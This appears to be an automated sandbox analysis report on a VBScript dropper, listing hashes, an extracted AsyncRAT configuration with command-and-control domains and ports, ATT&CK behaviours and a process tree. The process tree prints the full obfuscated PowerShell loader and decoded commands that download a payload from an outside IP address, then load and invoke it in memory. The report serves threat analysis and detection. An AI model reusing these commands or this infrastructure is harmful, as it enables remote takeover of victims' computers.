Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
20-11-2024 19:18
General
-
Target
sostener.vbs
-
Size
3.3MB
-
MD5
caa101219c251ee08a30546134d6c2b0
-
SHA1
23ada7a16f8151997e75fbc7e492ea74eaaf81dc
-
SHA256
86ca81b6d7f0d020571ab9e3c586d9066bef48f82c3b4aa4abec0e0d86a48765
-
SHA512
0a241d53ad5bfb3a5e75008968f2cb5d32bf08143e0c0fba29f5447f88cef78d56f822abf5f083413525856edb639e8b8601a8da895ae6d45929b7138c8033a8
-
SSDEEP
384:bfffftfffftfffftffff9fffftfffftfffftffff4fffftfffftfffftffff9ffH:tDn1C
Malware Config
Extracted
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt
Extracted
asyncrat
1.0.7
Server
dcratwas.duckdns.org:35650
dcratwas.duckdns.org:5999
dcratwas.duckdns.org:46452
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹Og☹v☹C8☹OQ☹x☹C4☹Mg☹w☹DI☹Lg☹y☹DM☹Mw☹u☹DE☹Ng☹5☹C8☹V☹Bh☹Gs☹LwBS☹GU☹Zw☹v☹E0☹YQBy☹Ho☹LwBE☹FI☹Rw☹v☹FI☹V☹BD☹C8☹QQBE☹C8☹Z☹Bs☹Gw☹LgB0☹Hg☹d☹☹n☹C☹☹Ow☹k☹EM☹WQBy☹Eo☹U☹☹g☹D0☹I☹☹o☹C☹☹WwBT☹Hk☹cwB0☹GU☹bQ☹u☹Ek☹Tw☹u☹F☹☹YQB0☹Gg☹XQ☹6☹Do☹RwBl☹HQ☹V☹Bl☹G0☹c☹BQ☹GE☹d☹Bo☹Cg☹KQ☹g☹Cs☹I☹☹n☹GQ☹b☹Bs☹D☹☹MQ☹u☹HQ☹e☹B0☹Cc☹I☹☹p☹C☹☹OwBJ☹G4☹dgBv☹Gs☹ZQ☹t☹Fc☹ZQBi☹FI☹ZQBx☹HU☹ZQBz☹HQ☹I☹☹t☹FU☹UgBJ☹C☹☹J☹BD☹EM☹UgBo☹G0☹I☹☹t☹E8☹dQB0☹EY☹aQBs☹GU☹I☹☹k☹EM☹WQBy☹Eo☹U☹☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹I☹Bw☹G8☹dwBl☹HI☹cwBo☹GU☹b☹Bs☹C4☹ZQB4☹GU☹I☹☹t☹GM☹bwBt☹G0☹YQBu☹GQ☹I☹B7☹C☹☹J☹BD☹Fk☹cgBK☹F☹☹I☹☹9☹C☹☹K☹☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹C☹☹KQ☹g☹Ds☹J☹Bn☹Ec☹aQBt☹EE☹I☹☹9☹C☹☹K☹☹g☹Ec☹ZQB0☹C0☹QwBv☹G4☹d☹Bl☹G4☹d☹☹g☹C0☹U☹Bh☹HQ☹a☹☹g☹CQ☹QwBZ☹HI☹SgBQ☹C☹☹KQ☹g☹Ds☹I☹B9☹C☹☹Ow☹k☹Gw☹ZQBm☹GM☹cw☹g☹D0☹I☹☹n☹D☹☹Jw☹g☹Ds☹J☹B4☹HM☹aQBo☹Gw☹I☹☹9☹C☹☹Jw☹l☹Eo☹awBR☹GE☹cwBE☹GY☹ZwBy☹FQ☹Zw☹l☹Cc☹I☹☹7☹Fs☹QgB5☹HQ☹ZQBb☹F0☹XQ☹g☹CQ☹YgBj☹HI☹c☹B1☹C☹☹PQ☹g☹Fs☹cwB5☹HM☹d☹Bl☹G0☹LgBD☹G8☹bgB2☹GU☹cgB0☹F0☹Og☹6☹EY☹cgBv☹G0☹QgBh☹HM☹ZQ☹2☹DQ☹UwB0☹HI☹aQBu☹Gc☹K☹☹g☹Cg☹I☹BH☹GU☹d☹☹t☹EM☹bwBu☹HQ☹ZQBu☹HQ☹I☹☹t☹F☹☹YQB0☹Gg☹I☹☹k☹EM☹WQBy☹Eo☹U☹☹g☹Ck☹LgBy☹GU☹c☹Bs☹GE☹YwBl☹Cg☹Jw☹k☹CQ☹Jw☹s☹Cc☹QQ☹n☹Ck☹I☹☹p☹C☹☹OwBb☹FM☹eQBz☹HQ☹ZQBt☹C4☹QQBw☹H☹☹R☹Bv☹G0☹YQBp☹G4☹XQ☹6☹Do☹QwB1☹HI☹cgBl☹G4☹d☹BE☹G8☹bQBh☹Gk☹bg☹u☹Ew☹bwBh☹GQ☹K☹☹k☹GI☹YwBy☹H☹☹dQ☹p☹C4☹RwBl☹HQ☹V☹B5☹H☹☹ZQ☹o☹Cc☹V☹Bl☹Gg☹dQBs☹GM☹a☹Bl☹HM☹W☹B4☹Fg☹e☹B4☹C4☹QwBs☹GE☹cwBz☹DE☹Jw☹p☹C4☹RwBl☹HQ☹TQBl☹HQ☹a☹Bv☹GQ☹K☹☹n☹E0☹cwBx☹EI☹SQBi☹Fk☹Jw☹p☹C4☹SQBu☹HY☹bwBr☹GU☹K☹☹k☹G4☹dQBs☹Gw☹L☹☹g☹Fs☹bwBi☹Go☹ZQBj☹HQ☹WwBd☹F0☹I☹☹o☹C☹☹JwBk☹EE☹Qg☹0☹EE☹S☹BR☹EE☹T☹Bn☹EE☹MgBB☹EY☹TQBB☹FI☹QQBB☹HY☹QQBG☹E0☹QQBW☹Gc☹QgBP☹EE☹RQBV☹EE☹T☹B3☹EI☹NgBB☹Eg☹SQBB☹Fk☹UQBC☹E4☹QQBD☹Dg☹QQBa☹Hc☹QgBs☹EE☹RgBJ☹EE☹T☹B3☹EI☹cgBB☹Ec☹RQBB☹FY☹QQBB☹HY☹QQBE☹Gs☹QQBO☹Gc☹QQB4☹EE☹Qw☹0☹EE☹TQB3☹EE☹egBB☹EQ☹SQBB☹Ew☹ZwBB☹Hk☹QQBE☹EE☹QQBN☹Gc☹QQB1☹EE☹R☹BF☹EE☹TwBR☹EE☹dgBB☹EM☹O☹BB☹E8☹ZwBC☹Hc☹QQBI☹FE☹QQBk☹EE☹QgBv☹EE☹QQ☹9☹D0☹Jw☹g☹Cw☹I☹☹k☹Hg☹cwBp☹Gg☹b☹☹g☹Cw☹I☹☹n☹FI☹ZgBk☹EU☹d☹☹2☹Cc☹L☹☹g☹CQ☹b☹Bl☹GY☹YwBz☹Cw☹I☹☹n☹DE☹Jw☹s☹C☹☹JwBS☹G8☹Z☹Bh☹Cc☹I☹☹p☹Ck☹I☹☹7☹☹==';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell $Yolopolhggobek;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$lefcs = '0' ;$xsihl = 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs' ;[Byte[]] $bcrpu = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($bcrpu).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgA2AFMARAAvAFMAVgBOAEUALwB6AHIAYQBNAC8AZwBlAFIALwBrAGEAVAAvADkANgAxAC4AMwAzADIALgAyADAAMgAuADEAOQAvAC8AOgBwAHQAdABoAA==' , $xsihl , 'RfdEt6', $lefcs, '1', 'Roda' )) ;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c4⤵
-
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD5f1224bc1865bebec82d960d863c971ae
SHA1e80d412cdd86489fffb6a39d7bcde8c461fde367
SHA2564ae68cf9056fd6e1448aa3b8b35f012ea2745a3a23c56308ba3b39c421eab905
SHA51208f7fbc4ab81bc9b928ef57ec1027589c431325f6be1777fc6996ea77117da234b695b2cf8eb31f9a7cc246b05990562a21a8f149a01b9727ddd4ad23026c04c
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
104KB
MD54f4cc2baf7a98aa5c29c3b21e48725cf
SHA1c25ebcb9b400d9fdab1655e5666e986731397840
SHA2561fe40914bf08072551be2995fa32e2567b9b394d0dfdb18a9ea99cc9cf3af001
SHA512c46a7282c617e78922f2dbd64bba2ba2161b54320ed04a81428f152d2dd64a001d15b7a18bc2eba56579d5000d345b13d06c8e140e278f14be36dfaa87da5c8c
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
72KB
-
Filesize
624KB
-
Filesize
5.6MB
-
Filesize
408KB